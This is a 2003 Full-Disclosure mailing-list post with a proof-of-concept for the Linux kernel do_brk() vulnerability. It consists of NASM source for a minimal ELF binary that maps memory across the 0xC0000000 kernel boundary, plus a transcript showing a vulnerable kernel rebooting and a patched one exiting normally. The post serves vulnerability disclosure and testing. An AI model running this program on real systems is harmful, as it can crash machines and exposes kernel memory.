

FullDisclosure: Linux kernel do_brk() proof-of-concept exploit code

From: Christophe Devine (DEVINE_at_iie.cnam.fr)
Date: Dec 01 2003


The following program can be used to test whether an x86 Linux system
is vulnerable to the do_brk() exploit; use at your own risk.

$ nasm brk_poc.asm -o a.out
$ chmod 755 a.out

$ uname -a
Linux test3 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1698
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
c0000000-c0003000 rwxp 00000000 00:00 0

(system reboots when the program exits)

$ uname -a
Linux test3 2.4.23 #1 Mon Dec 1 22:18:25 CET 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1591
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out

(the program exits gracefully)

$ cat brk_poc.asm

  ; ref.: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html

  ; brk_poc.asm -- a minimal static ELF32 image whose single PT_LOAD segment
  ; asks for memory reaching past 0xC0000000 (the default 32-bit x86 Linux
  ; user/kernel address split, TASK_SIZE).  The bytes beyond p_filesz are the
  ; "bss" tail that the ELF loader creates through do_brk(); that is the code
  ; path the transcript above is probing.  The program itself only sleeps for
  ; 20 s (long enough to read /proc/<pid>/maps) and then exits with status 0.
  ;
  ; Reading the result, per the transcript above:
  ;   - vulnerable kernel (2.4.22-10mdk): a second mapping c0000000-c0003000
  ;     appears in maps, and the machine rebooted when this process exited;
  ;   - fixed kernel (2.4.23): only bffff000-c0000000 is mapped and the
  ;     process exits normally.
  ;
  ; Layout: 52-byte ELF header, then one 32-byte program header, then code
  ; and the timespec.  The field order below is the on-disk Elf32 layout;
  ; the loader reads every field by offset, so nothing here may be reordered.
  BITS 32

                org 0xBFFFF000          ; load address: one page below 0xC0000000

  ehdr: ; Elf32_Ehdr (52 bytes)
                db 0x7F, "ELF", 1, 1, 1 ; e_ident: magic, ELFCLASS32, ELFDATA2LSB, EV_CURRENT
        times 9 db 0                    ; e_ident padding up to 16 bytes
                dw 2 ; e_type      ET_EXEC
                dw 3 ; e_machine   EM_386
                dd 1 ; e_version   EV_CURRENT
                dd _start ; e_entry    virtual address of the first instruction
                dd phdr - $$ ; e_phoff    file offset of the program header ($$ = org base), 52
                dd 0 ; e_shoff     no section header table
                dd 0 ; e_flags
                dw ehdrsize ; e_ehsize    52
                dw phdrsize ; e_phentsize 32
                dw 1 ; e_phnum     exactly one program header
                dw 0 ; e_shentsize
                dw 0 ; e_shnum     no sections at all
                dw 0 ; e_shstrndx

  ehdrsize equ $ - ehdr                 ; 52, by construction of the fields above

  phdr: ; Elf32_Phdr (32 bytes)
                dd 1 ; p_type     PT_LOAD
                dd 0 ; p_offset   segment starts at file offset 0 (headers included)
                dd $$ ; p_vaddr    0xBFFFF000
                dd $$ ; p_paddr
                dd filesize ; p_filesz   the whole file is mapped from disk
                dd 0x4000 ; p_memsz    16 KiB in memory: 0xBFFFF000..0xC0003000.
                          ; The tail beyond p_filesz crosses 0xC0000000; a
                          ; kernel with the do_brk() bug honours it and shows
                          ; c0000000-c0003000 in /proc/<pid>/maps.
                dd 7 ; p_flags    PF_R|PF_W|PF_X -- the "rwxp" seen in maps
                dd 0x1000 ; p_align    page

  phdrsize equ $ - phdr                 ; 32

  _start:

                mov eax, 162            ; __NR_nanosleep (i386)
                mov ebx, timespec       ; arg 1: req = &timespec (20 s)
                                        ; arg 2 (ecx, rem) is never set; the
                                        ; code relies on ecx being 0 at process
                                        ; entry -- NOTE(review): confirm for the
                                        ; target kernel/loader
                int 0x80

                mov eax, 1              ; __NR_exit
                mov ebx, 0              ; exit status 0
                int 0x80

  timespec dd 20,0                      ; struct timespec { tv_sec = 20, tv_nsec = 0 }

  filesize equ $ - $$                   ; size of the whole image; used as p_filesz

-- 
Christophe Devine - http://www.cr0.net:8040/about/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
